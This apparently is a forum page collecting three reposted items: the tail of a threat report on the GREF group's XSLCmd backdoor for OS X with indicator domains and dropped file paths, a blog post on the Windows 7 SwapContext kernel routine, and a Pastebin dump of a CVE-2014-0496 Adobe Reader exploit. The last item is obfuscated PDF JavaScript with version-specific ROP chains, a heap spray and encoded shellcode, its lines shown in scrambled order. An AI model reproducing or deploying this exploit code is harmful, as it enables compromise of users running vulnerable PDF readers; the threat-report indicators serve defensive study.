[/TR] [TR] [TD=width: 221]softwareupdatevmware[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]windowsnine[.]net[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]cdngoogle[.]com[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]cisco-inc[.]net[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]mremote[.]biz[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]officescan[.]biz[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]oprea[.]biz[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]battle.com[.]tw[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]diablo-iii[.]mobi[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]microsoftupdate[.]ws[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]msftncsl[.]com[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]square-enix[.]us[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]updatamicrosoft[.]com[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]powershell.com[.]tw[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]gefacebook[.]com[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]attoo1s[.]com[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]msnupdate[.]bz[/TD] [TD=width: 221]skydrive1951[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]googlemapsoftware[.]com[/TD] [TD=width: 221]skydrive1951[@]hotmail.com[/TD] [/TR] [/TABLE] XSLCmd Usage For the majority of the time we’ve been tracking them, XSLCmd has been the “go-to” backdoor for GREF, as shown by the wide range of compile dates for the Windows samples we have: from 2009-01-05 to 2013-08-01. Appendix 2 provides a partial list of Windows sample hashes and configuration metadata. Since Mach-O binaries do not have a compile timestamp like Windows executables, we can only infer from other data when the OS X variant was developed. As mentioned above, the “FakeDomain” was configured to “www.appleupdate[.]biz”, which was originally registered on August 2, 2012, and the registration appears to have updated on August 7, 2014, but the registrant is still the same “cast west”. When we found the sample on August 10, the domain did not resolve and there were no historical records for appleupdate[.]biz in any of the passive DNS (pDNS) sources we checked. In the intervening weeks, it has been seen by pDNS sensors, with the first query occurring on August 12, 2014 (which could be related to our research, since the hits are ‘nxdomain’), and then on August 16, 2014 there are pDNS records pointing to 61.128.110.38, which you’ll notice is the same IP the OS X version was configured to use. This could hint at the possibility that this OS X port of XSLCmd was recently developed and deployed; however, this remains uncertain. Other Backdoor Usage In addition to XSLCmd, GREF has utilized a number of other backdoors over time. Another backdoor unique to them, which we call “ddrh”, is a limited-feature backdoor that was frequently dropped in the SWC attacks in 2010, but has not been seen much since. Another historical backdoor attributed to GREF is one known as ERACS or Trojan.LURKER (not to be confused with LURK0 variant of Gh0st). This full-featured backdoor includes the usual backdoor functionality, including the support for additional modules, but it also includes a USB monitoring capability that generates a directory listing of USB-connected devices. We have also observed GREF using a handful of other common backdoors including Poison Ivy, Gh0st, 9002/HOMEUNIX, HKDoor, and Briba, but these occurrences have been pretty rare. All of the GREF 9002/HOMEUNIX samples in our repository have compile dates from 2009 or 2010. Interestingly enough, there is some overlap with a cluster detailed in a report we released in November of last year, specifically the “AllShell” cluster (C2: smtp.allshell[.]net). Starting in mid-2012, GREF started using the Kaba/SOGU backdoor. These early samples, which were discussed in great detail by LastLine in their blog post “An Analysis of PlugX,” are usually bundled into a RAR self-extracting executable and uses the three-part loading mechanism consisting of an executable, the malicious DLL that is side-loaded, and the shellcode file. In mid-2013, GREF switched to using a new Kaba/SOGU builder that created binaries with unique metadata. For example, many of these samples create a mutex of “PST-2.0” when executed, and some have the shared “HT Applications” version metadata. Conclusion The “A” in APT is generally used to describe the threat actors as “Advanced”, but with this blog, we also see that they are also “Adaptable.” Not only have they adopted new Windows-based backdoors over time, as Apple’s OS X platform has increased in popularity in many companies, they have logically adapted their toolset to match in order to gain and maintain a persistent foothold in the organizations they are targeting. OS X has gained popularity across enterprises, from less savvy users who find it easy to operate, to highly technical users that utilize its more powerful features, as well as with executives. Many people also consider it to be a more secure computing platform, which may lead to a dangerous sense of complacency in both IT departments and with users. In fact, while the security industry has started offering more products for OS X systems, these systems are sometimes less regulated and monitored in corporate environments than their Windows peers. Clearly as the OS X platform becomes more widely adopted across enterprises, threat groups like GREF will continue to adapt and find ways to exploit that platform. Credit to Jay Smith for his initial analysis of the Windows version of the XSLCmd backdoor and Joshua Homan for his assistance in this research. Appendix 1: XSLCmd for OS X created files [TABLE=width: 100%] [TR] [TD=width: 56%]Filename[/TD] [TD=width: 43%]Purpose[/TD] [/TR] [TR] [TD=width: 56%]$HOME/Library/LaunchAgents/clipboardd[/TD] [TD=width: 43%]executable[/TD] [/TR] [TR] [TD=width: 56%]/Library/Logs/clipboardd[/TD] [TD=width: 43%]executable when run as super user[/TD] [/TR] [TR] [TD=width: 56%]$HOME/Library/LaunchAgents/com.apple.service.clipboardd.plist[/TD] [TD=width: 43%]plist for persistence[/TD] [/TR] [TR] [TD=width: 56%]$HOME/.fontset/pxupdate.ini[/TD] [TD=width: 43%]configuration file[/TD] [/TR] [TR] [TD=width: 56%]$HOME/.fontset/chkdiska.dat[/TD] [TD=width: 43%]additional configuration file[/TD] [/TR] [TR] [TD=width: 56%]$HOME/.fontset/chkdiskc.dat[/TD] [TD=width: 43%]additional configuration file[/TD] [/TR] [TR] [TD=width: 56%]$HOME/Library/Logs/BackupData/<year><month><day>_<hr>_<min>_<sec>_keys.log[/TD] [TD=width: 43%]key log file[/TD] [/TR] [/TABLE] Sursa: Forced to Adapt: XSLCmd Backdoor Now on OS X | FireEye Blog

Windows Internals - A look into SwapContext routine Hi, Here I am really taking advantage of my summer vacations and back again with a second part of the Windows thread scheduling articles. In the previous blog post I discussed the internals of quantum end context switching (a flowchart). However, the routine responsible for context switching itself wasn't discussed in detail and that's why I'm here today. Here are some notes that'll help us through this post : 1 - The routine which contains code that does context switching is SwapContext and it's called internally by KiSwapContext. There are some routines that prefer to call SwapContext directly and do the housekeeping that KiSwapContext does themselves. 2 - The routines above (KiSwapContext and SwapContext) are implemented in ALL context switches that are performed no matter what is the reason of the context switch (preemption,wait state,termination...). 3 - SwapContext is originally written in assembly and it doesn't have any prologue or epilogue that are normally seen in ordinary conventions, imagine it like a naked function. 4 - Neither SwapContext or KiSwapContext is responsible for setting the CurrentThread and NextThread fields of the current KPRCB. It is the responsibility of the caller to store the new thread's KTHREAD pointer into pPrcb->CurrentThread and queue the current thread (we're still running in its context) in the ready queue before calling KiSwapContext or SwapContext which will actually perform the context-switch. Usually before calling KiSwapContext, the old irql (before raising it to DISPATCH_LEVEL) is stored in CurrentThread->WaitIrql , but there's an exception discussed later in this article. So buckle up and let's get started : Before digging through SwapContext let's first start by examining what its callers supply to it as arguments. SwapContext expects the following arguments: - ESI : (PKTHREAD) A pointer to the New Thread's structure. - EDI : (PKTHREAD) A pointer to the old thread's structure. - EBX : (PKPCR) A pointer to PCR (Processor control region) structure of the current processor. - ECX : (KIRQL) The IRQL in which the thread was running before raising it to DISPATCH_LEVEL. By callers, I mean the KiSwapContext routine and some routines that call SwapContext directly (ex : KiDispatchInterrupt). Let's start by seeing what's happening inside KiSwapContext : This routine expects 2 arguments the Current thread and New thread KTHREAD pointers in ECX and EDX respectively (__fastcall). Before storing both argument in EDI and ESI, It first proceeds to save these and other registers in the current thread's (old thread soon) stack: EBP : The stack frame base pointer (SwapContext only updates ESP). EDI : The caller might be using EDI for something else ,save it. ESI : The caller might be using ESI for something else ,save it too. EBX : The caller might be using EBX for something else ,save it too. Note that these registers will be popped from this same thread's stack when the context will be switched from another thread to this thread again at a later time (when it will be rescheduled to run). After pushing the registers, KiSwapContext stores the self pointer to the PCR in EBX (fs:[1Ch]).Then it stores the CurrentThread->WaitIrql value in ECX, now that everything is set up KiSwapContext is ready to call SwapContext. Again, before going through SwapContext let me talk about routines that actually call SwapContext directly and exactly the KiDispatchInterrupt routine that was referenced in my previous post. Why doesn't KiDispatchInterrupt call KiSwapContext ? Simply because it just needs to push EBP,EDI and ESI onto the current thread's stack as it already uses EBX as a pointer to PCR. Here, we can see a really great advantage of software context switching where we just save the registers that we really need to save, not all registers. Now , we can get to SwapContext and explain what it does in detail. The return type of SwapContext is a boolean value that tells the caller (in the new thread's stack) whether the new thread has any APCs to deliver or not. Let's see what SwapContext does in these 15 steps: 1 - The first thing that SwapContext does is verify that the new thread isn't actually running , this is only right when dealing with a multiprocessor system where another processor might be actually running the thread.If the new thread is running SwapContext just loops until the thread stops running. The boolean value checked is NewThread->Running and after getting out of the loop, the Running boolean is immediately set to TRUE. 2 - The next thing SwapContext does is pushing the IRQL value supplied in ECX. To spoil a bit of what's coming in the next steps (step 13) SwapContext itself pops ECX later, but after the context switch. As a result we'll be popping the new thread's pushed IRQL value (stack switched). 3 - Interrupts are disabled, and PRCB cycle time fields are updated with the value of the time-stamp counter. After the update, Interrupts are enabled again. 4 - increment the count of context switches in the PCR (Pcr->ContextSwitches++; ) , and push Pcr->Used_ExceptionList which is the first element of PCR (fs:[0]). fs:[0] is actually a pointer to the last registered exception handling frame which contains a pointer to the next frame and also a pointer to the handling routine (similar to usermode), a singly linked list simply. Saving the exception list is important as each thread has its own stack and thus its own exception handling list. 5 - OldThread->NpxState is tested, if it's non-NULL, SwapContext proceeds to saving the floating-points registers and FPU related data using fxsave instruction. The location where this data is saved is in the initial stack,and exactly at (Initial stack pointer - 528 bytes) The fxsave output is 512 bytes long , so it's like pushing 512 bytes onto the initial stack , the other 16 bytes are for stack-alignment I suppose.The Initial stack is discussed later during step 8. 6 - Stack Swapping : Save the stack pointer in OldThread->KernelStack and load NewThread->KernelStack into ESP. We're now running in the new thread's stack, from now on every value that we'll pop was previously pushed the last time when the new thread was preparing for a context-switch. 7 - Virtual Address Space Swapping : The old thread process is compared with the new thread's process if they're different CR3 register (Page directory pointer table register) is updated with the value of : NewThread->ApcState.Process->DirectoryTableBase. As a result, the new thread will have access to a valid virtual address space. If the process is the same, CR3 is kept unchanged. The local descriptor table is also changed if the threads' processes are different. 8 - TSS Esp0 Switching : Even-though I'll dedicate a future post to discuss TSS (task state segment) in detail under Windows , a brief explanation is needed here. Windows only uses one TSS per processor and uses only (another field is also used but it is out of the scope of this article) ESP0 and SS0 fields which stand for the kernel stack pointer and the kernel stack segment respectively. When a usermode to kernelmode transition must be done as a result of an interrupt,exception or system service call... as part of the transition ESP must be changed to point to the kernel stack, this kernel stack pointer is taken from TSS's ESP0 field. Logically speaking, ESP0 field of the TSS must be changed on every context-switch to the kernel stack pointer of the new thread. In order to do so, SwapContext takes the kernel stack pointer at NewThread->InitialStack (InitialStack = StackBase - 0x30) ,it substrats the space that it has used to save the floating-point registers using fxsave instruction and another additional 16 bytes for stack alignment, then it stores the resulted stack pointer in the TSS's Esp0 field : pPcr->TssCopy.Esp0 (TSS can be also accessed using the TR segment register). 9 - We've completed the context-switch now and the old thread can be finally marked as "stopped running" by setting the previously discussed boolean value "Running" to FALSE. OldThread->Running = FALSE. 10 - If fxsave was previously executed by the new thread (the last time its context was switched), the data (floating-point registers...) saved by it is loaded again using xrstor instruction. 11 - Next the TEB (Thread environment block) pointer is updated in the PCR : pPcr->Used_Self = NewThread->Teb . So the Used_Self field of the PCR points always to the current thread's TEB. 12 - The New thread's context switches count is incremented (NewThread->ContextSwitches++). 13 - It's finally the time to pop the 2 values that SwapContext pushed , the pointer to the exception list and the IRQL from the new thread's stack. the saved IRQL value is restored in ECX and the exception list pointer is popped into its field in the PCR. 14 - A check is done to see if the context-switch was performed from a DPC routine (Entering a wait state for example) which is prohibited. If pPrcb->DpcRoutineActive boolean is TRUE this means that the current processor is currently executing a DPC routine and SwapContext will immediately call KeBugCheck which will show a BSOD : ATTEMPTED_SWITCH_FROM_DPC. 15 - This is the step where the IRQL (NewThread->WaitIrql) value stored in ECX comes to use. As mentionned earlier SwapContext returns a boolean value telling the caller if it has to deliver any pending APCs. During this step SwapContext will check the new thread's ApcState to see if there are any kernel APCs pending. If there are : a second check is performed to see if special kernel APCs are disabled , if they're not disabled ECX is tested to see if it's PASSIVE_LEVEL, if it is above PASSIVE_LEVEL an APC_LEVEL software interrupt is requested and the function returns FALSE. Actually the only case that SwapContext returns TRUE is if ECX is equal to PASSIVE_LEVEL so the caller will proceed to lowering IRQL to APC_LEVEL first to call KiDeliverApc and then lower it to PASSIVE_LEVEL afterwards. Special Case : This special case is actually about the IRQL value supplied to SwapContext in ECX. The nature of this value depends on the caller in such way that if the caller will lower the IRQL immediately upon returning from SwapContext or not. Let's take 2 examples : KiQuantumEnd and KiExitDispatcher routines. (KiQuantumEnd is the special case) If you disassemble KiExitDispatcher you'll notice that before calling KiSwapContext it stores the OldIrql (before it was raised to DISPATCH_LEVEL) in the WaitIrql of the old thread so when the thread gains execution again at a later time SwapContext will decide whether there any APCs to deliver or not. KiExitDispatcher makes use of the return value of KiSwapContext (KiSwapContext returns the same value returned by SwapContext) to lower the IRQL. (see step 15 last sentence). However, by disassembling KiQuantumEnd you'll see that it's storing APC_LEVEL at the old thread's WaitIrql without even caring about in which IRQL the thread was running before. If you refer back to my flowchart in the previous article you'll see that KiQuantumEnd always insures that SwapContext returns FALSE , first of all because KiQuantumEnd was called as a result of calling KiDispatchInterrupt which is meant to be called when a DISPATCH_LEVEL software interrupt was requested.Thus, KiDispatchInterrupt was called by HalpDispatchSoftwareInterrupt which is normally called by HalpCheckForSoftwareInterrupt. HalpDispatchSoftwareInterrupt is the function responsible for raising the IRQL to the software interrupt level (APC_LEVEL or DISPATCH_LEVEL) and upon returning from it HalpCheckForSoftwareInterrupt recovers back the IRQL to its original value (OldIrql). So the reason why KiQuantumEnd doesn't care about KiSwapContext return value because it won't proceed to lowering the IRQL (not its responsibility) nor to deliver any APCs that's why it's supplying APC_LEVEL as an old IRQL value to SwapContext so that it will return FALSE. However, a software interrupt might be requested by SwapContext if there are any pending APCs. KiDispatchInterrupt which calls SwapContext directly uses the same approach as KiQuantumEnd, instead of storing the value at OldThread->WaitIrql it just moves it into ECX. Post notes : - Based on Windows 7 32 bit :> - For any questions or suggestions feel free to leave a comment below or send me an email : souhail.hammou@outlook.com See you again soon -Souhail Sursa: Reverse Engineering 0x4 Fun: Windows Internals - A look into SwapContext routine

[h=1]CVE-2014-0496 Adobe Pdf Exploit ToolButton[/h] @PhysicalDrive0 }); 1 0 obj 2 0 obj 3 0 obj 4 0 obj 5 0 obj 6 0 obj 7 0 obj aaa += aaa; aa=dd13.split("%u"); aa[i]=str12+aa[i]; /AcroForm 6 0 R addButtonFunc = function () { af1="aaaaa%aaaaaaaauaaaaaa"; af1=af1[("112","a2s1","replace")](/a/g,''); app.addToolButton({ app.addToolButton({ app.alert('123'); app.removeToolButton({ as1211(); bbb += aaa; bbb = bbb.substring(0, i11 / 2); bbb += sa; bbb += str; break; ccc += ccc; cEnable: "addButtonFunc();" cEnable: "removeButtonFunc();" cExec: "1", cExec: "1", cName: "evil" cName: "evil", cName: "xxx", </config> <config xmlns="http://www.xfa.org/schema/xci/2.6/"> /Count 1 dd13=aa.join('%u'); dd13=af1+dd13; dd13=xx13.join('%u'); } else { } else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { endobj endstream for (i = 0; i < 0x1c / 2; i++) part1 += this[un12]("%u4141"); for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); for (i = 0; i < aa[tt1]; i++) for (i = 0; i < part2_len / 2 - 1; i++) part2 += this[un12]("%u4141"); function as1211() function heapSpray(str, str_addr, r_addr) { function opp12(xx13) heapSpray(payload, ret_addr, r_addr); if (app.viewerVersion >= x11 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) { if(ccc[tt] >= (0x40000*2)) if(j) if (!r11) { if (vulnerable) { j=4-aa[i][tt1]; /Kids [3 0 R] <</Length 10074>> <</Length 372>> obj_size = 0x330 + 0x1c; obj_size = 0x360 + 0x1c; obj_size = 0x370; /OpenAction 4 0 R /Pages 2 0 R <pageSet></pageSet> /Parent 2 0 R part1 += rop_addr; %%%%%PDF-6.5 PE/%%%%%% <present><pdf><interactive>1</interactive></pdf></present> r11 = true; r_addr = 0x08a8; r_addr = 0x08e4; r_addr = 0x08e8; removeButtonFunc = function () { ret_addr = this[un12]("%u8003%u4a84"); ret_addr = this[un12]("%ua83e%u4a82"); ret_addr = this[un12]("%ua8df%u4a82"); return; return dd13; rop_addr = this[un12]("%u08a8%u0c0c"); rop_addr = this[un12]("%u08e4%u0c0c"); rop_addr = this[un12]("%u08e8%u0c0c"); rop = rop10; rop = rop11; rop = rop9; <</Size 8/Root 1 0 R>> str12=new Array(j+1).join("0"); stream <subform name="form1" layout="tb" locale="en_US"> </subform></template></xdp:xdp> <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/"> trailer tt1=tt1[("112","a2s1","replace")](/a/g,''); tt=tt[("112","a2s1","replace")](/a/g,''); /tYPE/aCTION/S/JavaScript/JS 5 0 R>> /type /Page /Type /Page /Type /Pages un12=''; un12=un12[("112","as1","replace")](/w/g,''); un12="uwnwwewwwswcwwwawwpwe"; var aaa = this[un12]("%u0c0c"); var arr = new Array(); var bbb = aaa.substring(0, i1 / 2); var ccc = bbb.substring(0, i2 / 2); var ddd = ccc.substring(0, 0x80000 - i3); var eee = new Array(); var executable = ""; var i11 = 0x0c0c - 0x24; var i1 = r_addr - 0x24; var i2 = 0x4000 + 0xc000; var i3 = (0x1020 - 0x08) / 2; var obj_size; var part1 = ""; var part2 = ""; var part2_len = obj_size - part1[tt1] * 2; var payload = rop + shellcode; var r11 = false; var r_addr; var ret_addr; var rop; var rop10 = this[("123","1a1",un12)](opp12(xx132)); var rop11 = this[("123","1a1",un12)](opp12(xx131)); var rop9 = this[("123","1a1",un12)](opp12(xx133)); var rop_addr; var sa = str_addr; var shellcode = this[("123","1a1",un12)](opp12(xx134)); var tt1="alaaeaanaaagataaah"; var tt="alaaeaanaagataah"; var vulnerable = true; var xx131=new Array(0x822c.toString(16),0x4a85.toString(16),0xf129.toString(16),0x4a82.toString(16),0x597f.toString(16),0x4a85.toString(16),0x6038.toString(16),0x4a86.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5093.toString(16),0x4a85.toString(16),0xbc12.toString(16),0x2946.toString(16),0x0030.toString(16),0x4a85.toString(16),0x597f.toString(16),0x4a85.toString(16),0x0031.toString(16),0x4a85.toString(16),0x8a79.toString(16),0x81ea.toString(16),0x822c.toString(16),0x4a85.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x6030.toString(16),0x4a86.toString(16),0x4864.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4856.toString(16),0x4a81.toString(16),0x05a0.toString(16),0x4a85.toString(16),0x0bc4.toString(16),0x4a86.toString(16),0x05a0.toString(16),0x4a85.toString(16),0xc376.toString(16),0x4a81.toString(16),0x63d0.toString(16),0x4a84.toString(16),0x0400.toString(16),0x0000.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x4864.toString(16),0x4a81.toString(16)); var xx132=new Array(0x6015.toString(16),0x4a82.toString(16),0xe090.toString(16),0x4a82.toString(16),0x007d.toString(16),0x4a82.toString(16),0x0038.toString(16),0x4a85.toString(16),0x46d5.toString(16),0x4a82.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5016.toString(16),0x4a80.toString(16),0x420c.toString(16),0x4a84.toString(16),0x4241.toString(16),0x4a81.toString(16),0x007d.toString(16),0x4a82.toString(16),0x6015.toString(16),0x4a82.toString(16),0x0030.toString(16),0x4a85.toString(16),0xb49d.toString(16),0x4a84.toString(16),0x6015.toString(16),0x4a82.toString(16),0x46d5.toString(16),0x4a82.toString(16),0x4197.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4013.toString(16),0x4a81.toString(16),0xe036.toString(16),0x4a84.toString(16),0xa8df.toString(16),0x4a82.toString(16),0xadef.toString(16),0xd2fc.toString(16),0x0400.toString(16),0x0000.toString(16),0xb045.toString(16),0x55c8.toString(16),0x8b31.toString(16),0x4a81.toString(16),0x4197.toString(16),0x4a81.toString(16)); var xx133=new Array(0x313d.toString(16),0x4a82.toString(16),0xa713.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x9038.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x155a.toString(16),0x4a80.toString(16),0x3a84.toString(16),0x4a84.toString(16),0xd4de.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x9030.toString(16),0x4a84.toString(16),0x4122.toString(16),0x4a84.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0x3178.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x3a82.toString(16),0x4a84.toString(16),0x6c5e.toString(16),0x4a84.toString(16),0x76ab.toString(16),0x4a84.toString(16),0xfec2.toString(16),0x2bca.toString(16),0x0400.toString(16),0x0000.toString(16),0xaab9.toString(16),0x6d5d.toString(16),0x7984.toString(16),0x4a81.toString(16),0x3178.toString(16),0x4a81.toString(16)); var xx134=new Array(0x88bf.toString(16),0xcb87.toString(16),0xdb8d.toString(16),0xd9c8.toString(16),0x2474.toString(16),0x5df4.toString(16),0xc929.toString(16),0x44b1.toString(16),0x7d31.toString(16),0x0314.toString(16),0x147d.toString(16),0xed83.toString(16),0x6afc.toString(16),0x1272.toString(16),0xf166.toString(16),0xd1a4.toString(16),0xf15d.toString(16),0xc866.toString(16),0x8e2c.toString(16),0x25b9.toString(16),0xfb34.toString(16),0x85cb.toString(16),0x8d3e.toString(16),0x6d27.toString(16),0x6d36.toString(16),0x37b3.toString(16),0x06bf.toString(16),0x97bd.toString(16),0x2e34.toString(16),0x977a.toString(16),0x3b52.toString(16),0x7e89.toString(16),0x1262.toString(16),0x6092.toString(16),0x1f04.toString(16),0x4701.toString(16),0x94e1.toString(16),0xbb9f.toString(16),0xfe62.toString(16),0xbc37.toString(16),0x1475.toString(16),0x76cc.toString(16),0x636e.toString(16),0xa689.toString(16),0x988f.toString(16),0x93cd.toString(16),0xd5c6.toString(16),0x5726.toString(16),0x07d9.toString(16),0x9877.toString(16),0x17eb.toString(16),0xca84.toString(16),0x5788.toString(16),0x1401.toString(16),0x9850.toString(16),0x1be7.toString(16),0xcd95.toString(16),0x200c.toString(16),0x3565.toString(16),0x22c5.toString(16),0xbe74.toString(16),0xe94f.toString(16),0x2b77.toString(16),0x7a09.toString(16),0xe07b.toString(16),0x265d.toString(16),0xf798.toString(16),0x5c8a.toString(16),0x7ca4.toString(16),0x8b4d.toString(16),0xc62c.toString(16),0x576a.toString(16),0x054e.toString(16),0x6fc0.toString(16),0x5db9.toString(16),0x95ac.toString(16),0x9f30.toString(16),0xdbc7.toString(16),0x110d.toString(16),0xb6f4.toString(16),0xb279.toString(16),0xc8fb.toString(16),0x4585.toString(16),0x3346.toString(16),0x2bc1.toString(16),0xd991.toString(16),0x5446.toString(16),0x3a3d.toString(16),0xb2fb.toString(16),0xbdb0.toString(16),0xbd04.toString(16),0x0444.toString(16),0x29f3.toString(16),0xeb3b.toString(16),0xe823.toString(16),0xc0ab.toString(16),0xc411.toString(16),0x4f4f.toString(16),0x6b23.toString(16),0xfdf5.toString(16),0xd743.toString(16),0x0bd1.toString(16),0x01dd.toString(16),0xf34f.toString(16),0xc988.toString(16),0xc9f9.toString(16),0x6a63.toString(16),0x6f51.toString(16),0x30ce.toString(16),0x6c25.toString(16),0x1af5.toString(16),0xecc2.toString(16),0x650a.toString(16),0x87ed.toString(16),0xe19b.toString(16),0x784a.toString(16),0x700c.toString(16),0x1d0c.toString(16),0x1a8e.toString(16),0xb89f.toString(16),0xa97d.toString(16),0x982e.toString(16),0x110a.toString(16),0x1475.toString(16),0x4a82.toString(16),0x701d.toString(16),0xacb4.toString(16),0xe8fe.toString(16),0xfff9.toString(16),0xc9b8.toString(16),0x8d69.toString(16),0x672b.toString(16),0x194a.toString(16),0x5bdb.toString(16),0xbfaa.toString(16),0xec4b.toString(16),0x53cf.toString(16),0xdde0.toString(16),0x23c6.toString(16),0x39b4.toString(16),0xbac9.toString(16),0x73a4.toString(16),0xee3b.toString(16),0x2575.toString(16),0xf1e9.toString(16),0xf4aa.toString(16),0x5dcd.toString(16),0xa2b4.toString(16),0x41c5.toString(16)); vulnerable = false; while (1) while ((aaa[tt] + 28) < (0x8000*2)) aaa += aaa; while (sa[tt] < (xxx - r_addr)) sa += sa; x11=9; <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <</XFA 7 0 R>> <?xml version="1.0" encoding="UTF-8"?> xxx=0x0c0c; Sursa: CVE-2014-0496 Adobe Pdf Exploit ToolButton - Pastebin.com